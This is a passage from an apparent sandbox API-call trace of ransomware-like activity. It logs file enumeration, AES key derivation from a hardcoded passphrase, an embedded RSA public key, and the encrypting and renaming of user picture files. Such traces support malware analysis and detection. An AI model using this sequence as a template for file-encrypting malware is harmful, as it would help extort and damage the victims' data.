CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.502] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.gsg", dwFileAttributes=0x2) returned 0 [0240.503] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.505] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.505] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.505] CryptHashData (hHash=0x28e8638, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.505] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e8578) returned 1 [0240.505] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.505] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.505] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f71a0) returned 1 [0240.505] CryptImportPublicKeyInfo (in: hCryptProv=0x28f71a0, dwCertEncodingType=0x1, pInfo=0x2908268*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908298*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29082a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6e38) returned 1 [0240.506] CryptEncrypt (in: hKey=0x28e6e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.506] CryptEncrypt (in: hKey=0x28e6e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f73c0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f73c0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.506] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f73c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.506] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.506] CryptEncrypt (in: hKey=0x28e8578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.506] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.506] CloseHandle (hObject=0xffffffff) returned 1 [0240.506] CloseHandle (hObject=0xffffffff) returned 1 [0240.506] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png"), bFailIfExists=0) returned 0 [0240.511] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png", dwFileAttributes=0x0) returned 0 [0240.512] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png.gsg")) returned 0 [0240.512] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png.fuck")) returned 0 [0240.513] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.513] CryptDestroyKey (hKey=0x28e8578) returned 1 [0240.513] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.513] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.513] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.513] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.513] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.513] GetLastError () returned 0x5 [0240.513] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png")) returned 0x20 [0240.513] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png", dwFileAttributes=0x80) returned 0 [0240.514] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.514] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.514] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.gsg", dwFileAttributes=0x2) returned 0 [0240.515] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.516] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.517] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.517] CryptHashData (hHash=0x28e8578, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.517] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e88b8) returned 1 [0240.517] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.517] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.517] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f7448) returned 1 [0240.517] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7448, dwCertEncodingType=0x1, pInfo=0x2908408*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908438*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908440*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6cf8) returned 1 [0240.517] CryptEncrypt (in: hKey=0x28e6cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.517] CryptEncrypt (in: hKey=0x28e6cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7800*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f7800*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.517] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7800, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.517] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.518] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.518] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.518] CloseHandle (hObject=0xffffffff) returned 1 [0240.518] CloseHandle (hObject=0xffffffff) returned 1 [0240.518] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png"), bFailIfExists=0) returned 0 [0240.524] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png", dwFileAttributes=0x0) returned 0 [0240.524] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.gsg")) returned 0 [0240.524] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.fuck")) returned 0 [0240.525] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.525] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.525] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.525] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.525] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.525] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.526] GetLastError () returned 0x5 [0240.526] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png")) returned 0x20 [0240.526] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png", dwFileAttributes=0x80) returned 0 [0240.526] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.527] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.527] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png.gsg", dwFileAttributes=0x2) returned 0 [0240.527] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.530] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.530] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.530] CryptHashData (hHash=0x28e8638, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.530] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e88b8) returned 1 [0240.530] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.530] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.530] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f74d0) returned 1 [0240.531] CryptImportPublicKeyInfo (in: hCryptProv=0x28f74d0, dwCertEncodingType=0x1, pInfo=0x2908678*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29086a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29086b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6ef8) returned 1 [0240.531] CryptEncrypt (in: hKey=0x28e6ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.531] CryptEncrypt (in: hKey=0x28e6ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7558*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f7558*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.531] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7558, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.531] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.531] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.531] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.531] CloseHandle (hObject=0xffffffff) returned 1 [0240.531] CloseHandle (hObject=0xffffffff) returned 1 [0240.531] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"), bFailIfExists=0) returned 0 [0240.539] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png", dwFileAttributes=0x0) returned 0 [0240.540] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.gsg")) returned 0 [0240.540] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.fuck")) returned 0 [0240.541] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.541] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.541] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.541] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.541] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.541] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.541] GetLastError () returned 0x5 [0240.541] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png")) returned 0x20 [0240.541] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png", dwFileAttributes=0x80) returned 0 [0240.542] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.542] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.543] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png.gsg", dwFileAttributes=0x2) returned 0 [0240.543] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.546] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.546] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.546] CryptHashData (hHash=0x28e8638, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.546] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e88b8) returned 1 [0240.546] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.546] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.546] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f7888) returned 1 [0240.546] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7888, dwCertEncodingType=0x1, pInfo=0x29059c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29059f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905a00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6d38) returned 1 [0240.546] CryptEncrypt (in: hKey=0x28e6d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.547] CryptEncrypt (in: hKey=0x28e6d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7910*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f7910*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.547] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7910, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.547] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.547] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.547] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.547] CloseHandle (hObject=0xffffffff) returned 1 [0240.547] CloseHandle (hObject=0xffffffff) returned 1 [0240.547] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"), bFailIfExists=0) returned 0 [0240.555] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png", dwFileAttributes=0x0) returned 0 [0240.555] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.gsg")) returned 0 [0240.556] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.fuck")) returned 0 [0240.556] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.556] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.556] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.557] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.557] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.557] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.557] GetLastError () returned 0x5 [0240.557] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png")) returned 0x20 [0240.557] SetFileAttributesA 